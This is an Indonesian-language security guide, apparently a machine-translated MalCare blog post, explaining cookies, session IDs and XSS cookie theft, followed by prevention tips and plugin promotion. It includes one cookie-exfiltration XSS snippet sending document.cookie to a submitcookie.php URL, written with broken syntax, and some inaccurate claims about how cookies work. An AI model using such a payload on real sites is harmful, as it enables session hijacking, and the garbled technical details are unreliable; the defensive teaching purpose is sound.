Bagaimana Mencegah Sesi Pencurian dan Pembajakan Cookie? (Panduan termudah)

Tahukah Anda bahwa situs web Anda menggunakan cookie untuk menyimpan data rahasia? Tahukah Anda bahwa peretas dapat dengan mudah mencuri cookie Anda? Ini dapat membahayakan situs web dan pengunjung Anda!

Cookie menyimpan semua jenis informasi – dari preferensi iklan pelanggan hingga kredensial masuk dan informasi kartu kredit. Cookie digunakan secara luas di internet dan menakutkan seberapa sering mereka dicuri.

Jika Anda adalah korban pencurian cookie atau pembajakan sesi, akibatnya sangat parah. Anda tidak hanya kehilangan pendapatan dan kepercayaan pengunjung Anda, tetapi Anda juga bisa menghadapi masalah hukum dan denda yang besar!

Tapi jangan khawatir karena hari ini, kami akan membawa Anda melalui semua yang perlu Anda ketahui untuk mencegah serangan ini!

Dalam panduan ini, pertama-tama kita akan belajar bagaimana peretas mencuri cookie, lalu kita akan membahas langkah-langkah pencegahannya.

TL;DR : Khawatir tentang situs web WordPress Anda? Anda dapat mengamankan situs Anda sekarang dengan menginstal Plugin Perlindungan Pembajakan Sesi & Cookie . Ini akan memindai situs web Anda secara teratur dan memberi tahu Anda jika peretas menyuntikkan kode berbahaya apa pun yang memungkinkan mereka mencuri cookie. Dengan menggunakan plugin, Anda dapat segera membersihkan peretasan & menghindari dampaknya.

Daftar Isi

→ Apa Itu Pencurian Cookie?

→ Bagaimana Peretas Menggunakan Cross-site Scripting (XSS) Untuk Mencuri Cookies & Sesi Pembajakan?

→ Bagaimana Mencegah Pencurian Cookie Dan Pembajakan Sesi?

→ Langkah-Langkah yang Dapat Dilakukan Pengunjung Situs Web Terhadap Pencurian Cookie

Apa itu Pencurian Cookie?

Seperti yang kita inginkan, mencuri kue tidak sesederhana seorang anak memasukkan tangannya ke dalam toples kue! Ini adalah proses yang kompleks dan untuk memahami apa yang terjadi, kita perlu menyentuh dasar-dasarnya.

→ Apa itu Cookie?

Anda dapat menganggap cookie sebagai bagian kecil dari data. Ini menyimpan informasi tentang interaksi Anda dengan situs web. Misalnya, situs eCommerce ingin melacak perjalanan pelanggan – produk yang dicari, produk yang dibeli, barang yang ditinggalkan di keranjang, atau halaman mana yang mereka kunjungi.

Ini memberikan informasi analitik toko tentang apa yang disukai pelanggan, halaman mana yang paling sering dikunjungi, berapa lama pengguna bertahan di halaman, dll. Mereka kemudian dapat menggunakan informasi ini untuk menyesuaikan apa yang ditampilkan di situs web sesuai dengan preferensi pelanggan.

Cookie memberikan wawasan kepada pemilik situs web tentang apa yang berhasil dan apa yang tidak. Ini membantu mereka menentukan apa yang mereka perlu ubah atau tingkatkan di situs mereka.

Cookie juga digunakan untuk menampilkan iklan yang relevan kepada pengguna. Saat Anda mengunjungi situs web, Anda akan melihat iklan yang ditampilkan.

Iklan ini biasanya mencerminkan riwayat pencarian terbaru Anda. Misalnya, jika Anda menelusuri 'laptop' di Google, Anda akan melihat bahwa iklan di semua situs web menampilkan iklan untuk dell. Iklan ini bukan merupakan bagian dari situs web tetapi ditangani oleh layanan seperti Google Adsense.

Cookie membuat segalanya nyaman bagi pemilik situs web dan pengguna. Itu dapat meningkatkan keterlibatan dan menghasilkan lebih banyak penjualan yang bagus untuk pemilik situs web. Bagi pembeli, cookie membantu mereka mendapatkan pengalaman yang lebih dipersonalisasi di situs web atau melihat iklan yang lebih relevan.

Tetapi ada banyak kekurangan yang akan kita bahas nanti.

[Kembali ke Atas ↑ ]

→ Apa Itu Sesi Peramban dan ID Sesi?

Saat Anda masuk ke situs web, sesi antara komputer Anda dan situs web ini dibuat.

Misalnya, saat Anda masuk ke Facebook, sesi dimulai. Ini memungkinkan Anda untuk tetap menggunakan Facebook (bahkan jika Anda menutup dan membuka kembali browser web) hingga Anda mengklik 'keluar' dan mengakhiri sesi.

Jika sesi tidak dibuat, Anda harus terus masuk setiap kali Anda menginginkan data baru. Misalnya, jika Anda ingin meninggalkan umpan berita Facebook dan melihat halaman profil teman, Anda akan keluar dari Facebook dan perlu memasukkan kredensial Anda lagi untuk masuk dan melihat profil teman tersebut.

Inilah mengapa sesi diperlukan. Itu membuat Anda tetap masuk sehingga Anda dapat terus menelusuri halaman web yang berbeda dan menavigasi situs web.

Yang penting untuk diperhatikan di sini adalah bahwa setiap sesi menghasilkan satu set cookie. Kami dapat memanggil cookie sesi ini. Dan setiap cookie sesi memiliki ID sesi yang unik.

Situs web menggunakan ID ini untuk mengautentikasi pengguna dan membuat koneksi tepercaya.

Misalnya, untuk masuk ke Facebook, Anda harus memasukkan nama pengguna dan kata sandi Anda. Selanjutnya, sesi dibuat dengan ID unik. Setiap permintaan yang Anda buat ke situs web Facebook akan diautentikasi dengan ID ini. Jadi, saat Anda ingin melihat halaman yang berbeda, Anda akan mengirimkan permintaan ke server Facebook untuk menampilkan halaman tersebut. Facebook memverifikasi ID dan menampilkan konten yang ingin Anda lihat.

Sekarang, peretas dapat membajak sesi Anda dan menyalahgunakan koneksi tepercaya ini. Mereka dapat mengirim permintaan jahat atas nama Anda. Mari kita lihat caranya.

[Kembali ke Atas ↑ ]

→ Apa Masalah Keamanan Dengan Cookie?

Saat cookie dibuat, cookie hanya dapat dilihat oleh Anda – pemilik situs. Tidak ada situs web lain yang dapat melihat cookie Anda. Mereka hanya milik Anda.

Tapi cookie ini tersebar di internet. Mereka digunakan oleh layanan iklan dan layanan analitik. Jadi cookie ini memantul dari server ke server di seluruh dunia. Jika koneksi tidak aman, peretas dapat dengan mudah mencegat dan mencuri cookie ini.

Sekarang, Anda mungkin berpikir bahwa jika seorang peretas berhasil mendapatkan informasi tentang preferensi belanja Anda, bukan masalah besar?

Masalahnya adalah cookie menyimpan lebih dari sekedar informasi tentang preferensi belanja Anda. Itu juga menyimpan detail bank dan informasi pribadi seperti alamat pengiriman dan detail kontak Anda.

Jika informasi semacam ini jatuh ke tangan yang salah, dapat disalahgunakan untuk kegiatan penipuan.

Salah satu cara paling umum peretas mencuri cookie adalah jika mereka menggunakan wifi yang sama dengan Anda. Peretasan wifi semacam ini disebut serangan man-in-the-middle dan hanya dapat terjadi jika keduanya terhubung ke jaringan nirkabel yang sama. Inilah mengapa disarankan untuk tidak pernah menggunakan wifi publik yang tidak aman atau digunakan oleh banyak orang. Ini juga dapat terjadi pada pengguna dalam jaringan komputer yang sama.

Beberapa metode lain termasuk mengendus paket dan dengan mengeksploitasi kerentanan yang disebut skrip lintas situs. Hari ini, kami akan menunjukkan kepada Anda secara detail cara kerja pencurian cookie XSS.

[Kembali ke Atas ↑ ]

Bagaimana Peretas Menggunakan Cross-site Scripting (XSS) Untuk Mencuri Cookie & Sesi Pembajakan?

Untuk menunjukkan kepada Anda bagaimana peretas mencuri cookie menggunakan serangan cross-site scripting (XSS), kami akan menggunakan sebuah contoh. Misalkan Anda mengunjungi situs web yang memiliki bagian komentar di dalamnya.

Setiap komentar yang Anda buat akan dikirim ke database situs web. Idealnya, bagian komentar ini harus dikonfigurasi untuk hanya menerima teks dalam bahasa Inggris sederhana. Tapi jika menerima karakter khusus juga, ini membuatnya rentan terhadap XSS.

Seorang hacker dapat memasukkan kode berbahaya mereka sendiri yang akan dikirim ke database. Begitu masuk, kode akan dieksekusi. Ada banyak kode yang dapat disisipkan peretas ke situs web untuk menjalankan segala macam aktivitas jahat seperti membuat admin situs web baru atau mencuri cookie.

Untuk mencuri cookie, peretas dapat memasukkan kode berikut:

Catatan: Ini bukan tutorial tentang cara mencuri cookie. Artikel ini dimaksudkan untuk menyadarkan pemilik situs web tentang bagaimana peretas dapat mencuri cookie. Kami tidak menyarankan Anda untuk melakukan aktivitas ilegal apa pun.

[php]

document.write('<img src=& amp;amp;amp;quot;http://localhost/submitcookie.php?cookie ='

+ escape(document.cookie) + '" />);

[/php]

Di bagian komentar, kode ini akan muncul sebagai gambar. Jika Anda (sebagai pengunjung) mengkliknya, Anda akan melihat gambar yang ditampilkan. Tapi ada lebih dari sekedar terjadi.

Saat Anda mengklik gambar, file PHP ini secara diam-diam mengeksekusi kode dan mengambil cookie sesi dan ID sesi Anda.

Sekarang peretas dapat membuat ulang sesi Anda dan berpose seperti Anda di situs web itu. Mereka dapat melakukan banyak tindakan jahat. Misalnya, jika kuki Anda berisi kartu kredit Anda atau informasi pembayaran lainnya, mereka dapat melakukan pembelian.

Untungnya, ada tindakan pencegahan untuk melindungi pemilik situs web serta pengunjungnya dari peretasan ini.

[ss_click_to_tweet tweet=”Jangan pernah mengklik tautan mencurigakan di bagian komentar situs web dan email. Anda bisa menjadi korban pencurian kue.” content=”Jangan pernah mengklik tautan mencurigakan di bagian komentar situs web dan email. Anda bisa menjadi korban pencurian kue.” gaya =”default”]

[Kembali ke Atas ↑ ]

Bagaimana Mencegah Pencurian Cookie Dan Pembajakan Sesi?

Ada dua pihak yang berperan dalam mencegah pencurian cookie dan pembajakan sesi – pemilik situs web dan pengunjung. Kami akan membahas tindakan pencegahan untuk kedua belah pihak.

→ Tindakan yang Dapat Dilakukan Pemilik Situs Web Terhadap Pencurian Cookie

Sebagai pemilik situs web, jika Anda tidak memiliki analis keamanan untuk menangani semuanya untuk Anda, Anda perlu menerapkan tindakan pencegahan berikut:

1. Instal Sertifikat SSL

Data ditransfer terus-menerus antara browser pengguna dan server web Anda. Tanpa SSL, data (cookie) ini dikirim dalam bentuk teks biasa. Jika seorang peretas mencegat data ini, mereka dapat dengan mudah membacanya. Jadi jika berisi kredensial login, itu akan diekspos.

SSL (Secure Sockets Layer) akan mengenkripsi data sebelum ditransfer. Jadi meskipun seorang hacker berhasil mencurinya, mereka tidak dapat membaca datanya.

Anda bisa mendapatkan sertifikat SSL melalui perusahaan hosting web Anda atau dari penyedia SSL. Anda juga bisa mendapatkan sertifikat SSL dasar gratis dari Let's Encrypt.

2. Instal Plugin Keamanan

Tetap aktifkan plugin keamanan WordPress seperti MalCare di situs web Anda. Firewall plugin akan mencegah upaya peretasan di situs web Anda dan memblokir alamat IP berbahaya. Plus, itu akan memindai situs Anda secara teratur dan memberi tahu Anda jika ada kode berbahaya yang dimasukkan oleh peretas. Anda dapat membersihkan situs web Anda secara instan. Ini akan membantu Anda mendeteksi dan menghapus upaya peretasan semacam itu segera sebelum menyebabkan kerusakan apa pun.

3. Perbarui Situs Web Anda

Selalu perbarui situs web Anda, ini termasuk pemasangan, tema, dan plugin WordPress. Menjalankan perangkat lunak usang membuka banyak titik rentan di situs web Anda yang dapat dieksploitasi oleh peretas. Pastikan Anda memperbarui situs Anda saat dan ketika pembaruan baru tersedia.

Pembaruan ini tidak hanya menghadirkan fitur baru dan perbaikan bug, tetapi juga memperbaiki kelemahan keamanan dari waktu ke waktu.

4. Perkuat Situs Web Anda

WordPress.org merekomendasikan tindakan pengerasan situs web tertentu yang harus Anda terapkan di situs web Anda. Ini termasuk menggunakan nama pengguna yang kuat dan unik serta kata sandi yang kuat, memblokir eksekusi PHP di folder yang tidak dikenal, menonaktifkan editor file di tema dan plugin, dan banyak lagi. Sekarang, ini mungkin terdengar seperti jargon bagi Anda, jadi kami telah membuat panduan langkah demi langkah yang mendalam untuk Pengerasan WordPress yang dapat Anda ikuti.

[Kembali ke Atas ↑ ]

Langkah-langkah yang Dapat Dilakukan Pengunjung Situs Web Terhadap Pencurian Cookie

Sebagai pengunjung situs web, Anda tidak perlu percaya begitu saja bahwa situs web telah mengambil tindakan pengamanan yang sesuai. Anda dapat melindungi diri sendiri dengan protokol keamanan web berikut.

1. Instal Antivirus yang Efektif

Pastikan perangkat yang Anda gunakan untuk mengakses internet telah menginstal perangkat lunak anti-malware. Ini akan memperingatkan Anda jika malware terdeteksi saat Anda mengunjungi situs web berbahaya. Itu juga akan menghapus malware apa pun yang mungkin Anda unduh atau instal secara tidak sengaja di sistem Anda.

2. Jangan Pernah Mengklik Tautan Mencurigakan

Peretas menargetkan pengguna melalui bagian komentar di situs web dan melalui email. Hindari mengklik tautan yang tidak tepercaya terutama yang memikat Anda dengan penawaran atau diskon menarik.

3. Hindari Menyimpan Data Sensitif

Menyimpan informasi kartu kredit di situs belanja membuat checkout lebih cepat dan nyaman. Menyimpan kata sandi di browser web seperti Google Chrome untuk login otomatis ke situs web menghilangkan kebutuhan untuk mengingat kata sandi!

Tapi itu semua datang dengan risiko tinggi untuk dicuri. Sebaiknya jangan pernah menyimpan data sensitif di situs web. Ini mungkin menghemat beberapa detik, tetapi juga membuat Anda berisiko diserang.

4. Hapus Cookie

Anda dapat menghapus cookie secara teratur untuk menghilangkan informasi sensitif apa pun yang disimpan di browser seperti Google Chrome. Akses Riwayat > Hapus Riwayat Penjelajahan. Di sini, centang kotak 'Cookies and other site data'.

Pilih rentang waktu 'Sepanjang Waktu' atau yang sesuai dengan preferensi Anda. Selanjutnya, klik 'Hapus data' dan cookie akan dihapus dari riwayat browser Anda.

Itu membawa kita pada akhir dari pencurian cookie. Kami harap artikel ini membantu Anda mendapatkan pemahaman yang lebih baik tentang apa yang sebenarnya terjadi dan bagaimana cara mencegahnya.

[ss_click_to_tweet tweet=”Panduan dari MalCare ini membantu saya memahami pencurian cookie dan cara mengambil tindakan pencegahan terhadapnya. Coba lihat." content=”Panduan dari MalCare ini membantu saya memahami pencurian cookie dan cara mengambil tindakan pencegahan terhadapnya. Coba lihat." gaya =”default”]

[Kembali ke Atas ↑ ]

Pikiran Akhir

Sebagai pemilik situs web, Anda perlu mengambil tindakan perlindungan untuk mengamankan kepentingan Anda sendiri serta pengunjung, klien, dan pelanggan Anda. Namun kami memahami bahwa menyiapkan situs web dan mengelolanya adalah tugas yang sulit.

Ada banyak sekali hal yang harus diurus, itulah sebabnya keamanan WordPress cenderung mengambil kursi belakang berkali-kali.

Tetapi mengabaikan aspek keamanan situs web Anda dapat menjadi bencana bagi semua upaya Anda yang lain.

Solusi yang mudah, cepat, dan efisien adalah plugin keamanan MalCare. Anda dapat menganggapnya sebagai penjaga keamanan yang Anda sewa. Ini akan bekerja sepanjang waktu untuk memindai situs web Anda secara teratur dan melindunginya dari serangan. Anda dapat yakin bahwa situs web Anda berada di tangan yang aman.

Lindungi situs WordPress Anda dengan MalCare !